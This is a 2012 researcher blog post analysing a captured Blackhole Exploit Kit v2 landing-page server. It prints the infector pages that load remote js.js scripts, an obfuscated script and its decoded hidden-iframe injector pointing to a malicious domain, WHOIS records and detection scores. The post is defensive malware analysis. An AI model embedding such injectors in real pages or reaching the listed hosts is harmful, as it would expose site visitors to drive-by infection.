Wednesday, November 7, 2012

Full Disclosure: An inside peek of BlackHole v2 Landing Page Infector Server

Again with pairing with @Hulk_Crusader we detected and deeply accessed the BHEK2 landing page infector server as per reported with following details:
HostName/URL: 
h00p://qtecmetalworks.co.za/
IP: 184.22.145.99
ASN   |Prefix           | ASName| CN |Domain      |ISP of an IP Address
---------------------------------------------------------------------------------
21788 | 184.22.128.0/19 | NOC   | US | NOCINC.COM | NETWORK OPERATIONS CENTER INC
This malware server was "adjusted" by angels:-)) to be accessed from global↓ ↑We call it Blackhole Landing Page (assumed is ver2) Then we downloaded all of the data in the malware server into our local drive: The files we grabbed in total:
FINISHED --00:59:09--
Downloaded: 317,468 bytes in 51 files
And here we are ready to analyze one by one :-)

BHEK2 Landing Page of js.js Infectors...

This server is meant to infect malware served by Blackhole EK v2, functioned as a landing page with some infectors lead to js.js, the name of directories are randomized for the usage of "one-click" infection method. Link to the js.js can be found in the "random-named" sub directories, with below PoC:
$ cat 3BkNLfK8/index.html
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>

$ cat 3m25hamZ/index.html
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>

$ cat 4rXBB637/index.html
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>

$ cat 6QeGacX2/index.html
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>

$ cat 6zyrYCSy/index.html
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>

$ cat 89ac0r17/index.html
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>

Plugin Detect access infector...

There is one html file called postinfo.html which is having links that goes to the BHEK PluginDetect, (which the PluginDetect) server looks already taken down.. Well, the postinfo.html has the evil code like this↓
<body><!--de1b9a--><script>String.prototype.test="harC";for(i in $='')if(i=='test')
-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,101-n,99-n,114-n,67-n,106-n,99-n,107-n,99
,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n
7-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,46-n,37-n,30-n,102-n,99-n,103-
56-n,46-n,57-n,114-n,109-n,110-n,56-n,46-n,57-n,37-n,60-n,58-n,45-n,103-n,100-n,112
99-n,107-n,99-n,108-n,114-n,38-n,37-n,103-n,100-n,112-n,95-n,107-n,99-n,37-n,39-n,5
01-n,99-n,59-n,52-n,53-n,98-n,46-n,53-n,55-n,54-n,49-n,97-n,54-n,97-n,52-n,99-n,95-
15-n,114-n,99-n,37-n,57-n,100-n,44-n,113-n,114-n,119-n,106-n,99-n,44-n,106-n,99-n,1
4-n,114-n,112-n,103-n,96-n,115-n,114-n,99-n,38-n,37-n,102-n,99-n,103-n,101-n,102-n,
,102-n,103-n,106-n,98-n,38-n,100-n,39-n,57-n,7-n,7-n,123-n];for(i=0;i<n.length;i++)
 :
Which we decoded these in to below code:
if (document.getElementsByTagName('body')「0」){
  iframer();}
else {
  document.write("
<iframe src='h00p://mittemidagi.com/main.php?page=67d07983c8c6ea7f' width='10' height='10'
 style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'h00p://mittemidagi.com/main.php?page=67d07983c8c6ea7f');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);}
↑As per code mentioned is an iframer script of below:
<iframe src='h00p://mittemidagi.com/main.php?page=67d07983c8c6ea7f' 
width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'></iframe>
↑just checking the domain and found interesting owner name:-))
Registrant:
         Bob Dylan  +1.38489858898 +1.38489858898
         MitteMidagi
         85 Avenu
         New York,NY,US 32134
Domain Name:mittemidagi.com 
Record last updated at 2011-09-07 15:29:41
Record created on 9/7/2011
Record expired on 09/07/2012
All of the payloads and CnC of this server is already taking cared of, so we don't go to the deatils of those, let's get the next infectors! :-)

Virus Total checks...

index.html (20/44) [LINK] postinfo.html (26/43) [LINK]

The sample is shared...

For fellow researchers, here's the sample:--->>[LINK]
#MalwareMustDie!!